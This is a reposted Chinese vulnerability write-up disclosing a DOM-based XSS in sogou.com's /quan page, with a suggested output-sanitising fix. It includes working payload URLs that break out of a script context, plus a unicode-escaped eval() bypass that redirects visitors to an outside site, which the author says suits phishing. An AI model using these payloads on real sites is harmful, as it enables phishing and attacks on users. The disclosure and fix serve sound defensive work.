鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

搜狗主站domxss一枚

来源:互联网 作者:佚名 时间:2015-10-19 08:38
很久之前发现的,一直在研究,想着发出来吧,早点修复对厂商也是好事情。 最开始发现的时候,只能用来弹个框框,甚至跳转都写不了。 直接上个图: http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8qt=zhaopin%22}%0aalert(1)//sourceid=inttab_n
很久之前发现的,一直在研究,想着发出来吧,早点修复对厂商也是好事情。
 
最开始发现的时候,只能用来弹个框框,甚至跳转都写不了。
 
 
直接上个图:
 
http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aalert(1)//&sourceid=inttab_news
 
过所有浏览器,因此利用不存在浏览器限制。
 
执行之后:
 
 
wutongyu.jpg
 
 
嗯嗯,这里只是弹个窗口,甚至都不能做什么。
 
 
 
拿来做个钓鱼跳转还是不错的。
 
当我以为直接替换alert(1)为eval(location.href=%22http://wutongyu.info%22)就可以跳转的时候,发现却被截断了:
 
http://www.sogou.com/quan?query=%E6%A2%A7%E6%A1%90%E9%9B%A8&qt=zhaopin%22}%0aeval(location.href=%22http://wutongyu.info%22)//&sourceid=inttab_news
 
如图:
 
 
 

 
又因为这里的输出在<script>之间,因此我们把eval()里头的内容js转一下就可以绕过了:
 
http://www.sogou.com/quan?query=梧桐雨&qt=zhaopin"}%0a%0a%0aeval("\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0075\u0074\u006f\u006e\u0067\u0079\u0075\u002e\u0069\u006e\u0066\u006f\u0027")//&sourceid=inttab_news
 
这段跳去我的博客。 
 
上面写的比较清楚了。当然利用过程也还有很多种,譬如拿来当成一个xss后门:
 
参考:http://www.80sec.com/%E6%B7%B1%E6%8E%98xss%E6%BC%8F%E6%B4%9E%E5%9C%BA%E6%99%AF%E4%B9%8Bxss-rootkit-%E4%BF%AE%E8%AE%A2.html
 
 
 
 
修复方案:
 
净化输出:',\,以及),}等。
 
代码大约在86行。
 
网友评论
<